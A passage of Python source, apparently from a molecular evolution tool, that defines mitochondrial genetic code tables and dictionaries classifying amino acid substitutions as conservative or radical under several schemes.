'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 
'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt cod
aaSchemeDict1 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"C",("A","Y"):"C",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"C",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"C",("N","Y"):"C",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"C",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"C",("C","Y"):"C",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"C",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"C",("G","T")
:"C",("G","W"):"C",("G","Y"):"C",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"C",("I","Y"):"C",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"C",("L","Y"):"C",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"C",("M","Y"):"C",("M","V"):"C",("F","P"):"C",("F","S"):"C",("F","T"):"C",("F","W"):"C",("F","Y"):"C",("F","V"):"C",("P","S"):"C",("P","T"):"C",("P","W"):"C",("P","Y"):"C",("P","V"):"C",("S","T"):"C",("S","W"):"C",("S","Y"):"C",("S","V"):"C",("T","W"):"C",("T","Y"):"C",("T","V"):"C",("W","Y"):"C",("W","V"):"C",("Y","V"):"C",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A
"):"C",("T","A"):"C",("W","A"):"C",("Y","A"):"C",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"C",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"C",("Y","N"):"C",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"C",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"C",("Y","C"):"C",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"C",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"C",("Y","G"):"C",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"C",("Y","I"):"C",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"C",("Y","L"):"C",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"C",("Y","M"):"C",("V","M"):"C",("P","F"):"C",("S","F"):"C",("T","F"):"C",("W","F"):"C",("Y","F"):"C",("V","F"):"C",("S","P"):"C",("T","P"):"C",("W","P"):"C",("Y","P"):"C",("V","P"):"C",("T","S"):"C",("W","S"):"C",("Y","S"):"C",("V","S"):"C",("W","T"):"C",("Y","T"):"C",("V","T"):"C",("Y","W"):"C",("V","W"):"C",("V","Y"):"C",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict2 = {("R","H"):"C",("R","K"):"C",("R","D"):"C",("R","E"):"C",("R","A"):"R",("R","N"):"C",("R","C"):"C",("R","Q"):"C",("R","G"):"C",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"C",("R","T"):"C",("R","W"):"R",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"C",("H","E"):"C",("H","A"):"R",("H","N"):"C",("H","C"):"C",("H","Q"):"C",("H","G"):"C",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"C",("H","T"):"C",("H","W"):"R",("H","Y"):"C",("H","V"):"R",("K","D"):"C",("K","E"):"C",("K","A"):"R",("K","N"):"C",("K","C"):"C",("K","Q"):"C",("K","G"):"C",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"C",("K","T"):"C",("K","W"):"R",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"C",("D","Q"):"C",("D","G"):"C",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"C",("D","T"):"C",("D","W"):"R",("D","Y"):"C",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"C",("E","Q"):"C",("E","G"):"C",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"C",("E","T"):"C",("E","W"):"R",("E","Y"):"C",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T")
:"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"C",("E","R"):"C",("A","R"):"R",("N","R"):"C",("C","R"):"C",("Q","R"):"C",("G","R"):"C",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"C",("T","R"):"C",("W","R"):"R",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"C",("E","H"):"C",("A","H"):"R",("N","H"):"C",("C","H"):"C",("Q","H"):"C",("G","H"):"C",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"C",("T","H"):"C",("W","H"):"R",("Y","H"):"C",("V","H"):"R",("D","K"):"C",("E","K"):"C",("A","K"):"R",("N","K"):"C",("C","K"):"C",("Q","K"):"C",("G","K"):"C",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"C",("T","K"):"C",("W","K"):"R",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"C",("Q","D"):"C",("G","D"):"C",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"C",("T","D"):"C",("W","D"):"R",("Y","D"):"C",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"C",("Q","E"):"C",("G","E"):"C",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"C",("T","E"):"C",("W","E"):"R",("Y","E"):"C",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A
"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict3 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"R",("D","Q"):"C",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"R",("E","Q"):"C",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"R",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"R",("N","T"):"R",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"R",("C","T"):"R",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T")
:"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"C",("F","T"):"C",("F","W"):"R",("F","Y"):"R",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"R",("Q","D"):"C",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"R",("Q","E"):"C",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A
"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"R",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"R",("T","N"):"R",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"R",("T","C"):"R",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"C",("T","F"):"C",("W","F"):"R",("Y","F"):"R",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict4 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"C",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"C",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"C",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"C",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"C",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"C",("H","Y"):"C",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"C",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"C",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"C",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"C",("N","Q"):"R",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"C",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T")
